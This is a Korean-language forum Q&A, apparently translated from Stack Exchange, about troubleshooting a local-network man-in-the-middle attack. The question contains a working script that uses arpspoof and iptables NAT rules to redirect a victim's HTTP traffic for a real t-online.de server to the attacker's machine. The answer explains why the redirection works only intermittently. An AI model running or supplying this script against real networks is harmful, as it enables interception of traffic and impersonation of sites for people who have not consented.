Iptables는 때때로 생각대로 작동하지 않습니다.


0

로컬 네트워크에서 중간자 공격을 시도하고 navigationshilfe1.t-online.de 서버를 내 서버로 바꾸려고합니다. 나중에 http 서비스 대신 사용자 정의 서비스를 교체하고 싶습니다. 내 현재 스크립트는 다음과 같습니다

sysctl -w net.ipv4.ip_forward=1

export TARGET=192.168.2.104
export ATTACKER=192.168.2.115
export GATEWAY=192.168.2.1
export SITE=62.138.238.45 #  navigationshilfe1.t-online.de

iptables -t nat -F

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -d $SITE -j DNAT --to-destination $ATTACKER:80
iptables -t nat -A POSTROUTING -p tcp -s $ATTACKER --source-port 80 -j SNAT --to-source $SITE:80

iptables -t nat -L -n -v

arpspoof -i eth0 -c both -t $TARGET -r $GATEWAY

문제는 때로는 대상의 웹 브라우저가 실제 사이트를 표시하고 페이지를 몇 번 새로 고치면 가짜 페이지를 표시하고 그 반대도 마찬가지라는 것입니다. 연결이 왜 나쁜지 아는 사람이 있습니까?


또한 투명한 프록시 가 일반적으로 어떻게 구성되어 있는지 살펴보십시오 iptables(처음에는 HTTP 트래픽을 가로 채고 싶을 것입니다).
dirkt

답변:


0

가능성이 몇 가지 있습니다

iptables nat 규칙은 연결의 첫 번째 패킷에서만 작동합니다. 연결이 설정되면 내부 맵핑 테이블이 사용됩니다.

브라우저는 연결을 재사용하여 연결 설정 오버 헤드를 저장합니다. 따라서 규칙을 추가하기 전에 브라우저에 여전히 열린 연결이있는 경우 해당 연결에 대한 요청이 전환되지 않습니다.

또 다른 가능성은 브라우저에서 캐싱의 영향을보고 있다는 것입니다. 브라우저는 종종 "조건부 가져 오기"를 수행하여 클라이언트가 마지막으로 다운로드 한 이후 타임 스탬프에 변경된 페이지가있는 경우에만 페이지를 다시 다운로드합니다.


연결 유지 및 기타 알 수없는 몇 가지 요인 때문일 수 있습니다. 이제 실제 대상 프로토콜 (smb)과 안정적으로 작동합니다.
mohe2015
당사 사이트를 사용함과 동시에 당사의 쿠키 정책개인정보 보호정책을 읽고 이해하였음을 인정하는 것으로 간주합니다.
Licensed under cc by-sa 3.0 with attribution required.